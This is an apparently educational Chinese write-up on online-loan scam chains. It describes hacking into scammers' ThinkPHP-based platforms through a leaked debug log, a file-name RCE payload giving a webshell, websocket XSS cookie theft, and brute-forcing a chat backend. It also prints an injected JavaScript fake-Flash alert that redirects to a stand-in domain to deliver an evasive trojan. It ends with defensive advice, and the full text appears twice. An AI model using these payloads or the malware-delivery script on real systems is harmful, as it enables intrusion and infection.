针对网贷诈骗行业诈骗链分析
字数 1478 2025-08-25 22:59:15

网贷诈骗行业诈骗链分析与防御教学文档

一、网贷诈骗概述

1.1 典型诈骗案例

  • 诈骗短信:以"无抵押无审核"为噱头吸引受害者
  • 目标人群:急需用钱的个体经营者、超前消费的上班族、大学生等
  • 国际范围:案例显示诈骗活动已扩展至巴西等国家,500余名巴西受害者

1.2 诈骗流程分析

  1. 诱导下载:通过短信诱导受害者下载诈骗APP
  2. 信息收集:要求填写身份证、手持照片、工作地点、家人信息等
  3. VIP费用:以"VIP费用会连同贷款一起返还"为由收取688元
  4. 刷流水:谎称"信用额度不够"要求再缴纳3500元证明还款能力
  5. 工本费用:声称"审批成功"但需支付3000元工本费
  6. 虚假合同:发送伪造的贷款合同增加可信度

二、诈骗源码漏洞分析

2.1 第一套源码漏洞分析(基于ThinkPHP 3.2.3)

2.1.1 ThinkPHP日志泄漏

  • 漏洞成因:默认开启Debug模式导致日志泄漏
  • 利用方法
    • 构造Payload:App/Runtime/Logs/21_10_16.log
    • 获取泄漏的admin表账号密码
    • 进入后台

2.1.2 数组可控导致RCE

  • 漏洞点:文件名被直接带入数据包,后端以数组方式控制
  • 利用方法
    • 在可上传文件名中加入php代码
    • 上传获取Webshell
    • 替代Payload:siteName=11111').phpinfo();//
    • 需注意字符串连接符"."的使用

2.2 第二套源码漏洞分析

2.2.1 客服处Websocket-XSS

  • 攻击面:客服系统存在XSS漏洞
  • 利用方法
    • 通过客服入口上传图片
    • 修改websocket数据包构造XSS
    • 获取Cookie

三、诈骗系统控制技术

3.1 数据库控制

  • 信息收集:通过MySQL数据库查询诈骗嫌疑人登录IP
  • 溯源价值:动态IP(如杭州电信基站)通常家庭路由,溯源价值有限

3.2 客服系统控制

  1. 发现后台:在源码中找到在线客服系统后台地址
  2. 账号爆破:前端显示账号存在但密码错误
  3. 越权访问
    • 自行注册客服系统
    • 通过adminid配合uid遍历SetCookie实现越权
    • 爆破获取密码
  4. 信息收集
    • 查看完整诈骗话术链
    • 分析受害者聊天记录

3.3 Flash钓鱼攻击

  1. 攻击准备
    • 免杀木马
    • 伪造的flash域名(含"flash"字样)
  2. 攻击实施
    • 在后台登录跳转文件插入JS代码:
    <script>window.alert = function(name){
  var iframe = document.createElement("IFRAME");
  iframe.style.display="none";
  iframe.setAttribute("src", 'data:text/plain,');
  document.documentElement.appendChild(iframe);
  window.frames[0].window.alert(name);
  iframe.parentNode.removeChild(iframe);
};
alert("您的FLASH版本过低,请尝试升级后访问改页面!");
window.location.href="https://www.flashxxxx.com";
</script>
  3. 攻击效果:诱导下载执行恶意程序

四、防御建议

4.1 对普通用户的建议

  1. 警惕"无抵押无审核"贷款广告
  2. 不轻易提供身份证、手持照片等敏感信息
  3. 任何要求提前支付费用的贷款都是诈骗
  4. 通过正规渠道申请贷款

4.2 对开发者的建议

  1. ThinkPHP安全配置
    • 生产环境关闭Debug模式
    • 定期清理日志文件
    • 使用最新稳定版本
  2. 文件上传安全
    • 严格限制上传文件类型
    • 对上传内容进行安全检查
    • 不信任用户提供的任何文件名
  3. XSS防护
    • 对所有用户输入进行过滤和转义
    • 设置CSP策略
    • 对Websocket通信内容进行安全检查
  4. 权限控制
    • 实施严格的权限验证
    • 使用不可预测的Session ID
    • 防止越权访问

4.3 对企业的建议

  1. 定期进行安全审计
  2. 建立完善的安全事件响应机制
  3. 对客服系统进行特别防护
  4. 保持所有组件和依赖库更新

五、总结

网贷诈骗产业链已形成完整的技术链和话术链,诈骗者利用技术漏洞和心理弱点实施犯罪。通过分析诈骗源码的漏洞,我们可以更好地理解攻击者的技术手段,从而制定更有效的防御策略。安全是一个持续的过程,需要开发者、企业和用户共同努力才能有效对抗日益复杂的网络诈骗威胁。

网贷诈骗行业诈骗链分析与防御教学文档 一、网贷诈骗概述 1.1 典型诈骗案例 诈骗短信 :以"无抵押无审核"为噱头吸引受害者 目标人群 :急需用钱的个体经营者、超前消费的上班族、大学生等 国际范围 :案例显示诈骗活动已扩展至巴西等国家,500余名巴西受害者 1.2 诈骗流程分析 诱导下载 :通过短信诱导受害者下载诈骗APP 信息收集 :要求填写身份证、手持照片、工作地点、家人信息等 VIP费用 :以"VIP费用会连同贷款一起返还"为由收取688元 刷流水 :谎称"信用额度不够"要求再缴纳3500元证明还款能力 工本费用 :声称"审批成功"但需支付3000元工本费 虚假合同 :发送伪造的贷款合同增加可信度 二、诈骗源码漏洞分析 2.1 第一套源码漏洞分析(基于ThinkPHP 3.2.3) 2.1.1 ThinkPHP日志泄漏 漏洞成因 :默认开启Debug模式导致日志泄漏 利用方法 : 构造Payload: App/Runtime/Logs/21_10_16.log 获取泄漏的admin表账号密码 进入后台 2.1.2 数组可控导致RCE 漏洞点 :文件名被直接带入数据包,后端以数组方式控制 利用方法 : 在可上传文件名中加入php代码 上传获取Webshell 替代Payload: siteName=11111').phpinfo();// 需注意字符串连接符"."的使用 2.2 第二套源码漏洞分析 2.2.1 客服处Websocket-XSS 攻击面 :客服系统存在XSS漏洞 利用方法 : 通过客服入口上传图片 修改websocket数据包构造XSS 获取Cookie 三、诈骗系统控制技术 3.1 数据库控制 信息收集 :通过MySQL数据库查询诈骗嫌疑人登录IP 溯源价值 :动态IP(如杭州电信基站)通常家庭路由,溯源价值有限 3.2 客服系统控制 发现后台 :在源码中找到在线客服系统后台地址 账号爆破 :前端显示账号存在但密码错误 越权访问 : 自行注册客服系统 通过adminid配合uid遍历SetCookie实现越权 爆破获取密码 信息收集 : 查看完整诈骗话术链 分析受害者聊天记录 3.3 Flash钓鱼攻击 攻击准备 : 免杀木马 伪造的flash域名(含"flash"字样) 攻击实施 : 在后台登录跳转文件插入JS代码: 攻击效果 :诱导下载执行恶意程序 四、防御建议 4.1 对普通用户的建议 警惕"无抵押无审核"贷款广告 不轻易提供身份证、手持照片等敏感信息 任何要求提前支付费用的贷款都是诈骗 通过正规渠道申请贷款 4.2 对开发者的建议 ThinkPHP安全配置 : 生产环境关闭Debug模式 定期清理日志文件 使用最新稳定版本 文件上传安全 : 严格限制上传文件类型 对上传内容进行安全检查 不信任用户提供的任何文件名 XSS防护 : 对所有用户输入进行过滤和转义 设置CSP策略 对Websocket通信内容进行安全检查 权限控制 : 实施严格的权限验证 使用不可预测的Session ID 防止越权访问 4.3 对企业的建议 定期进行安全审计 建立完善的安全事件响应机制 对客服系统进行特别防护 保持所有组件和依赖库更新 五、总结 网贷诈骗产业链已形成完整的技术链和话术链,诈骗者利用技术漏洞和心理弱点实施犯罪。通过分析诈骗源码的漏洞,我们可以更好地理解攻击者的技术手段,从而制定更有效的防御策略。安全是一个持续的过程,需要开发者、企业和用户共同努力才能有效对抗日益复杂的网络诈骗威胁。